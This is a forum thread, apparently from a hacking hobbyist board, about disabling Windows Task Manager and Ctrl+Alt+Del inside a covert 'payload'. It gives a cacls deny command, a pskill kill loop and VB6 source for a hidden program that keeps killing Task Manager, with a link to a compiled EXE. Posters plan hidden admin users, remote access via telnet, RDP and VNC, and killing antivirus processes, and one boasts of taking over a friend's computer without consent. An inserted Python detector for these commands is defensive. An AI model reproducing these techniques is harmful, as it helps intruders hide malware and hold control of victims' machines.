Disabling Ctrl+Alt+Del/Taskmgr


Posted

Has anyone thought of, or implemented a method to disable Ctrl alt del or taskmgr? I figured out an easy way to disable it and thought about trying to re-map the ctrl alt del keys to something else... just an idea

Posted

It can be done easily in the registry... If someone can be bothered looking up how to do it. Except this is a dead giveaway that someone's computer is infected.

Posted

True, but I didn't use the registry. That was the supposedly simplest way of disabling it, but the so-called registry entries weren't even in my registry and I didn't try to create them. I used cacls to disable it from the current logged on user. Trying to figure out now how to disable it for only maybe 30 seconds or so.

Posted
rename taskmgr.exe

Like Explorer.exe, it will put a new copy out there (or at least it should) from dll cache files or backups. You have to be logged on in safe mode, rename the file in dll cache (that it pulls a backup from) and then rename the file. I used this method to update a file so I can make my own themes that wouldn't run under the original uxtheme dll file.

All system files should automatically replace themselves, and if they don't you can use something like system file checker to get it back.

http://en.wikipedia.org/wiki/System_File_Checker

Posted

Yea I've read about renaming and deleting the file and that it will create a backup upon next reboot or so. I'm just disabling it for about 30 seconds or so. I used:

cacls c:\windows\system32\taskmgr.exe /D %COMPUTERNAME%\%USERNAME%

which seems to work just fine for now. I just am trying to figure out how to re-enable it again but after 30 seconds exactly.

cacls c:\windows\system32\taskmgr.exe /g %COMPUTERNAME%\%USERNAME%:r

re-enables it to the current logged on user with read only access which is fine I just want that command to execute exactly 30 seconds after it has been disabled. The only way I can think of is to ping the localhost and try to do it for only 30 seconds somehow.

Posted

oh so basically you were just using fix.reg as an example? It's not a real file?

sleep.exe doesn't seem to do anything besides pause for a period of time which is exactly what I wanted, I did however create an antidote.

Posted

also in gpedit.msc

Posted
oh so basically you were just using fix.reg as an example? It's not a real file?

sleep.exe doesn't seem to do anything besides pause for a period of time which is exactly what I wanted, I did however create an antidote.

it doesn't....
Posted

I don't see why you would want to disable taskmanager... If the user actually tries to use it, and it doesn't work, they will immediately know something's wrong.

Posted

Depends on the user... I know for one thing my parents would have no idea how to fix it and are too afraid to modify the registry for fear of breaking Windows.

It would be a great little addition you could add for those not-so-experienced Windows users. Renaming the executable would really mess with them too. Can't hurt to add it to the payload, like everything else, you can enable/disable it at your own liking. Personally I think it would be fun. Ya it's kind of obvious, but that will just make them wonder who/how that got disabled. I love playing pranks with the hacksaw 8-) Friend of mine reinstalled Windows last week because I VNCed into his comp and started messing with him. He freaked. I'm gonna go disable Ctrl-Alt-Delete on him now... he's not techy enough to figure that one out. hehe...

Posted

Better would be a Task Manager clone that hides your programs from showing up in it, or making a registry file that points to your version of a Taskmanager.exe on a thumb drive that hides your programs from being seen and then reverts back at the end of your payload to the original Taskmanager on exit. This way they can still use Task Manager to end certain programs but yours never show up in Taskmanager. If I remember correctly, there are some Taskmanager clones on PSC in VB6, so all you need to do is make the GUI look identical to the system you're on and you're pretty much golden. Make several variants to match the OS, like one for XP, 2000, Server 2003, etc.

They all look similar anyway so some people might not even notice. And since it's not a virus, it shouldn't set off any alerts, although ZoneAlarm seems to ask to allow EVERY program to run if it is set up properly.

It will be defeated if someone checks msinfo32.exe because they can see running tasks in there as well. But then again, you could do the same thing here and make a clone that filters out your running payloads.

Posted

@ remkow,

Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable.

@ digip,

I'm liking that idea a lot :) actually I had something similar in mind that would be a 3 step process.

It would start out maybe just enabling telnet, rdp and creating a hidden admin user.

Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc.

Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that.

Posted
@ remkow,

Yea it would make it a bit obvious something is going on that's why I only wanted to disable it for about 30 seconds then re-enable.

@ digip,

I'm liking that idea a lot :) actually I had something similar in mind that would be a 3 step process.

It would start out maybe just enabling telnet, rdp and creating a hidden admin user.

Then IF the user presses a series of keys e.g. ctrl+alt+del then it will launch step 2 and do a virus killer, etc.

Then if they try to run taskmgr.exe at all then launch step 3 which would be maybe vnc install something like that.

You will have to put hooks in there to check for getting taskmanager from other places too though. Like right clicking the taskbar or "start/run/taskmgr"

Posted

@ digip,

yea that's exactly why I said if taskmgr.exe is attempted to run at all that specific process then execute step 3, hooks are you referring to ( )? Sorry I'm still a newbie at batch :?

Posted

My method is kind of ghetto, but it works well.  :smile:

make a batch file like this with pskill. Have it launched using nircmd with this command: nircmd execmd [batch file name]

:begin

pskill -t "TASKMGR.EXE"

goto begin

Posted

Here is a little vb6 app that when run, hides it off screen and captures the delete key as well as mouse movements, so if they right click the taskbar to start taskmgr or use start/run or even windowskey+R to load a run box and manually run taskmgr, it kills taskmgr from running. Press F12 and it unloads the program, or add another timer and kill the vb6 program after so many minutes.

'End Taskmgr in Windows XP
'12/31/2007 - DigiP
'
'Following Line allows ShellExecute commands
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long

'Mouse Detection Src Code: http://www.daniweb.com/forums/thread101100.html
Private Type POINTAPI
    X As Long
    Y As Long
End Type

Private Declare Function GetCursorPos Lib "User32" (lpPoint As POINTAPI) As Long


Private Sub Form_KeyUp(KeyCode As Integer, Shift As Integer)

On Error GoTo poo
If KeyCode = vbKeyDelete Then 'Because we only want to check if delete is pressed in combo with ctrl+alt+del
MakeNotTopMost (Me.hWnd)
ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
End If

MakeTopMost (Me.hWnd)

'Change this to whatever you want!
If KeyCode = vbKeyF12 Then Unload Me

Exit Sub


poo:
MakeTopMost (Me.hWnd)
Exit Sub

End Sub



Private Sub Timer1_Timer()
Dim Point As POINTAPI
Dim lngReturn As Long
Dim lngScreenX As Long
Dim lngScreenY As Long
lngReturn = GetCursorPos(Point)
lngScreenX = Point.X
lngScreenY = Point.Y
' Enter Code to whatever you want with the results
'
'Debug.Print "X-pos: " & lngScreenX & " , Y-pos: " & lngScreenY

On Error GoTo poo
MakeNotTopMost (Me.hWnd)
ShellExecute 0&, vbNullString, "TASKKILL", " /F /IM taskmgr.exe", vbNullString, vbHide
MakeTopMost (Me.hWnd)
Exit Sub

poo:
MakeTopMost (Me.hWnd)
Exit Sub

End Sub

Create a form and add timer to it (Set the interval to like 2000 which is 2 seconds or 1000 for 1 second). Then resize the form to like 10x10 pixels and make its start up position off screen. Done.

Full source project download as well as working EXE file: http://www.twistedpairrecords.com/digip/ctrled.rar

And BTW, virus scanners do not detect it since it really isn't malicious code, just built in Windows functions. Will not work on anything older than XP since taskmgr is not a program on 98 or 95 and taskkill is an XP system program.

This can still be detected and defeated by opening cmd.exe and typing in tasklist to see what's running. Then killing it with:

taskkill /F /IM ctrled.exe

I leave it up to you if you also want to kill cmd.exe or command.com, but leave yourself a way to end it safely or it will run forever until you reboot.
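
Seen from the monitoring side, the cacls deny and the pskill/taskkill loops posted in this thread all show up as process command lines. The following is an added example, not part of the original thread: it scans process-creation records for those commands and flags hosts where Task Manager is being killed repeatedly. The pipe-delimited record format, the host and user names, and the burst threshold are assumptions, and the sample records are constructed.

```python
import re
from datetime import datetime, timedelta

# Rules keyed to the commands shown in this thread, matched on the command line.
RULES = [
    ("acl_deny_taskmgr",
     re.compile(r"\b(?:cacls|icacls)(?:\.exe)?\b.*taskmgr\.exe.*\s/(?:d|deny)\b", re.I)),
    ("kill_taskmgr",
     re.compile(r"\b(?:taskkill|pskill)(?:\.exe)?\b.*taskmgr", re.I)),
]

# Constructed records: timestamp|host|user|command line (format is an assumption).
SAMPLE = [
    r"2024-05-01T10:00:00|WS01|alice|cacls c:\windows\system32\taskmgr.exe /D WS01\alice",
    r"2024-05-01T10:00:30|WS01|alice|cacls c:\windows\system32\taskmgr.exe /g WS01\alice:r",
    r'2024-05-01T10:05:00|WS02|bob|pskill -t "TASKMGR.EXE"',
    r'2024-05-01T10:05:01|WS02|bob|pskill -t "TASKMGR.EXE"',
    r'2024-05-01T10:05:02|WS02|bob|pskill -t "TASKMGR.EXE"',
    r"2024-05-01T10:06:00|WS03|carol|TASKKILL /F /IM taskmgr.exe",
    r"2024-05-01T10:07:00|WS03|carol|taskkill /F /IM ctrled.exe",
    r"2024-05-01T10:08:00|WS04|dave|tasklist",
]

def scan(lines, burst=3, window=timedelta(seconds=10)):
    """Return (findings, loop_hosts): per-record rule hits, and hosts where
    Task Manager was killed `burst` or more times within `window`."""
    findings, kills = [], {}
    for line in lines:
        ts, host, user, cmd = line.split("|", 3)
        for name, rx in RULES:
            if rx.search(cmd):
                findings.append((ts, host, user, name))
                if name == "kill_taskmgr":
                    kills.setdefault(host, []).append(datetime.fromisoformat(ts))
    loop_hosts = set()
    for host, times in kills.items():
        times.sort()
        # Sliding check: any `burst` consecutive kills inside the window is a loop.
        for i in range(len(times) - burst + 1):
            if times[i + burst - 1] - times[i] <= window:
                loop_hosts.add(host)
    return findings, sorted(loop_hosts)

if __name__ == "__main__":
    hits, loops = scan(SAMPLE)
    for hit in hits:
        print(*hit)
    print("kill loop on:", loops)
```

The grant command that restores access and the `taskkill /F /IM ctrled.exe` cleanup are deliberately not flagged, so the findings separate the tampering from the recovery.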

Posted

@ digip,

Nice one. I'll have to play around with that. Hmmm... how bout not kill cmd, but really restrict it to limited usage... actually... I wonder if there is an app cmd-like that when a user runs cmd or command.com those commands are mapped to a custom "shell" a fake shell something that would not allow the user to run admin commands, but appear as normal shell... I got quite a few ideas in mind I would like to create something not so much as to do damage, but to really make a user think.

@ Sc0rpi0,

Yea I plan to use pskill to kill all existing av/spyware processes... or wouldn't it be better if instead of killing the process just stop the service temporarily ;)
